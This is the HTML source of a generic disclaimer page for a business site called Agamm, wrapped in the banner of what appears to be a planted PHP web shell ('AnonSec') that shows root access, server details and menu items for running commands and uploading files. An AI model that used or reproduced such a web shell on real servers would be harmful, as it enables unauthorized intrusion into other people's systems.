|
Server IP : 149.13.87.7 / Your IP : 185.174.145.2 Web Server : nginx System : Linux h2 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : root ( 0) PHP Version : 8.0.28 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /mnt/platforms/workspaces/shortable.org/../agamm.org/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Disclaimer - Agamm</title>
<script src="https://cdn.tailwindcss.com"></script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.css" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<style>
body {
padding-top: 80px;
}
@media (max-width: 768px) {
body {
padding-top: 72px;
}
}
</style>
<link rel="stylesheet" href="assets/css/dynamic.css">
</head>
<body class="antialiased">
<nav class="fixed w-full z-50 top-0 bg-gradient-to-r from-white via-gray-50 to-white shadow-sm">
<div class="max-w-screen-xl flex flex-wrap items-center justify-between mx-auto px-6 py-2">
<a href="./" class="flex items-center space-x-4">
<div class="relative group">
<div class="absolute inset-0 bg-gradient-to-br from-indigo-400 to-violet-500 rounded-2xl blur opacity-50 group-hover:opacity-75 transition-opacity"></div>
<div class="relative w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-2xl flex items-center justify-center shadow-lg">
<span class="text-white font-bold text-2xl">A</span>
</div>
</div>
<div>
<span class="block text-2xl font-black text-gray-900">Agamm</span>
<span class="block text-xs text-indigo-600 font-semibold uppercase tracking-wider">Excellence</span>
</div>
</a>
<button data-collapse-toggle="navbar-default" type="button" class="inline-flex items-center p-2 w-10 h-10 justify-center text-sm text-gray-500 rounded-lg md:hidden hover:bg-gray-100">
<svg class="w-5 h-5" fill="none" viewBox="0 0 17 14">
<path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M1 1h15M1 7h15M1 13h15"/>
</svg>
</button>
<div class="hidden w-full md:block md:w-auto" id="navbar-default">
<ul class="font-bold flex flex-col md:flex-row md:space-x-8 items-center">
<li><a href="./" class="block py-2 text-gray-700 hover:text-indigoHome</a></li>
<li><a href="about-us.php" class="block py-2 text-gray-700 hover:text-indigo-600 transition-colors relative group">About</a></li>
<li><a href="blog/" class="block py-2 text-gray-700 hover:text-indigoBlog</a></li>
<li>
<a href="contact.php" class="block py-3 px-8 text-white bg-gradient-to-r from-indigo-600 to-violet-600 rounded-full hover:shadow-xl hover:scale-105 transition-all">Contact</a>
</li>
</ul>
</div>
</div>
</nav>
<style>
.legal-content h3 {
font-size: 1.5rem;
font-weight: 700;
color: #1f2937;
margin-top: 2rem;
margin-bottom: 1rem;
}
.legal-content h4 {
font-size: 1.25rem;
font-weight: 600;
color: #374151;
margin-top: 1.5rem;
margin-bottom: 0.75rem;
}
.legal-content p {
margin-bottom: 1rem;
line-height: 1.75;
}
.legal-content ul {
margin: 1rem 0 1.5rem 1.5rem;
list-style-type: disc;
}
.legal-content ul li {
margin-bottom: 0.5rem;
line-height: 1.75;
}
.legal-content strong {
font-weight: 600;
color: #1f2937;
}
.legal-content a {
color: #3b82f6;
text-decoration: underline;
}
.legal-content a:hover {
color: #2563eb;
}
</style><section class="bg-white py-24 pt-32">
<div class="container mx-auto px-6 max-w-5xl">
<div class="border-b-2 border-gray-200 pb-6 mb-10">
<h1 class="text-5xl font-bold text-gray-900 mb-2">Disclaimer</h1>
<p class="text-gray-600">Last updated: May 11, 2026</p>
</div>
<div class="legal-content text-gray-700">
<p>If you require any more information or have any questions about our site's disclaimer, please feel free to contact us by email at business@agamm.org.</p>
<h3>Disclaimers for Agamm</h3>
<p>All the information on this website - https://agamm.org - is published in good faith and for general information purpose only. Agamm does not make any warranties about the completeness, reliability and accuracy of this information. Any action you take upon the information you find on this website (Agamm), is strictly at your own risk. Agamm will not be liable for any losses and/or damages in connection with the use of our website.</p>
<p>From our website, you can visit other websites by following hyperlinks to such external sites. While we strive to provide only quality links to useful and ethical websites, we have no control over the content and nature of these sites. These links to other websites do not imply a recommendation for all the content found on these sites. Site owners and content may change without notice and may occur before we have the opportunity to remove a link which may have gone 'bad'.</p>
<p>Please be also aware that when you leave our website, other sites may have different privacy policies and terms which are beyond our control. Please be sure to check the Privacy Policies of these sites as well as their "Terms of Service" before engaging in any business or uploading any information.</p>
<h3>Consent</h3>
<p>By using our website, you hereby consent to our disclaimer and agree to its terms.</p>
<h3>Update</h3>
<p>Should we update, amend or make any changes to this document, those changes will be prominently posted here.</p>
</div>
</div>
</section>
<footer class="bg-gradient-to-br from-gray-50 via-white to-gray-50 text-gray-900 py-16 border-t-4 border-indigo-500">
<div class="max-w-screen-xl mx-auto px-4">
<div class="grid md:grid-cols-4 gap-12 mb-12">
<div class="md:col-span-2">
<a href="./" class="flex items-center space-x-3 mb-6">
<div class="w-14 h-14 bg-gradient-to-br from-indigo-500 to-violet-600 rounded-2xl flex items-center justify-center shadow-lg">
<span class="text-white font-bold text-2xl">A</span>
</div>
<span class="text-3xl font-black text-gray-900">Agamm</span>
</a>
<p class="text-gray-600 mb-6 max-w-md">Delivering excellence and innovation to help your business thrive.</p>
<div class="flex space-x-3">
<a href="#" class="w-10 h-10 bg-gray-200 hover:bg-indigo-600 text-gray-700 hover:text-white rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-facebook-f"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-200 hover:bg-indigo-600 text-gray-700 hover:text-white rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-twitter"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-200 hover:bg-indigo-600 text-gray-700 hover:text-white rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-linkedin-in"></i>
</a>
<a href="#" class="w-10 h-10 bg-gray-200 hover:bg-indigo-600 text-gray-700 hover:text-white rounded-lg flex items-center justify-center transition-all">
<i class="fab fa-instagram"></i>
</a>
</div>
</div>
<div>
<h3 class="text-lg font-black mb-6 text-gray-900">Navigation</h3>
<ul class="space-y-3 text-gray-600">
<li><a href="./" class="hover:text-indigoHome</a></li>
<li><a href="about-us.php" class="hover:text-indigo-600 transition-colors">About Us</a></li>
<li><a href="blog/" class="hover:text-indigoBlog</a></li>
<li><a href="contact.php" class="hover:text-indigo-600 transition-colors">Contact</a></li>
</ul>
</div>
<div>
<h3 class="text-lg font-black mb-6 text-gray-900">Legal</h3>
<ul class="space-y-3 text-gray-600">
<li><a href="privacy.php" class="hover:text-indigo-600 transition-colors">Privacy Policy</a></li>
<li><a href="terms.php" class="hover:text-indigo-600 transition-colors">Terms of Service</a></li>
<li><a href="disclaimer.php" class="hover:text-indigo-600 transition-colors">Disclaimer</a></li>
</ul>
</div>
</div>
<div class="border-t border-gray-200 pt-8">
<div class="flex flex-col md:flex-row justify-between items-center gap-4">
<p class="text-gray-600 text-sm">© 2026 Agamm. All rights reserved.</p>
<div class="flex items-center gap-2 text-sm text-gray-600">
<span>Made with</span>
<i class="fas fa-heart text-indigo-600"></i>
<span>for you</span>
</div>
</div>
</div>
</div>
</footer>
<script src="https://cdnjs.cloudflare.com/ajax/libs/flowbite/2.2.0/flowbite.min.js"></script>
</body>
</html>
AnonSec - 2021